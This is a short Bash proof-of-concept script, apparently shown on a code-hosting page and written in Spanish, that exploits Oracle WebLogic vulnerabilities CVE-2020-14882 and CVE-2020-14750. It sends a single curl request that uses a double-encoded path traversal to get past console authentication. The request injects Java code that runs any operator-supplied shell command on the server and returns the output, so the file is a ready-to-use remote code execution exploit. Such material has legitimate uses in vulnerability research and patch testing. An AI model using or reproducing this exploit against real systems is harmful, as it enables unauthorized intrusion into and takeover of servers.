/
CVE-2020-14750.sh
25 lines (20 loc) · 2.19 KB
/
CVE-2020-14750.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/bin/bash
###################################################
# CVE-2020-14882 #
# CVE-2020-14750 #
# Autor: Pedro Prieto Sanchez #
# twitter: @PPrietoSanchez #
# PoC de la vulnerabilidad de Oracle Weblogic con #
# los codigos CVE anteriormente escritos #
###################################################
if [ "$1" == "-h" ] || [ -z "$1" ] || [ -z "$2" ]; then
echo "Modo de empleo: `basename $0` host:puerto comandoremoto
Intenta explotar las vulnerabilidades CVE-2020-14882 y CVE-2020-14750 en el host especificado ejecutando el comando especificado"
exit 0
fi
host=$1
cmd=${@:2}
curl -k -s -X POST \
-H "Host: $host" -H "cmd: $cmd" \
--data-binary $'\x0d\x0a_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\x0d\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\x0d\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\x0d\x0afield.setAccessible(true);\x0d\x0aObject obj = field.get(adapter);\x0d\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\x0d\x0aString cmd = req.getHeader(\"cmd\");\x0d\x0aString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\x0d\x0aif (cmd != null) {\x0d\x0a String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\x0d\x0a weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\x0d\x0a res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\x0d\x0a res.getServletOutputStream().flush();\x0d\x0a res.getWriter().write(\"\");\x0d\x0a}executeThread.interrupt();\x0d\x0a\");' \
"http://$host/console/css/%252e%252e%252fconsole.portal"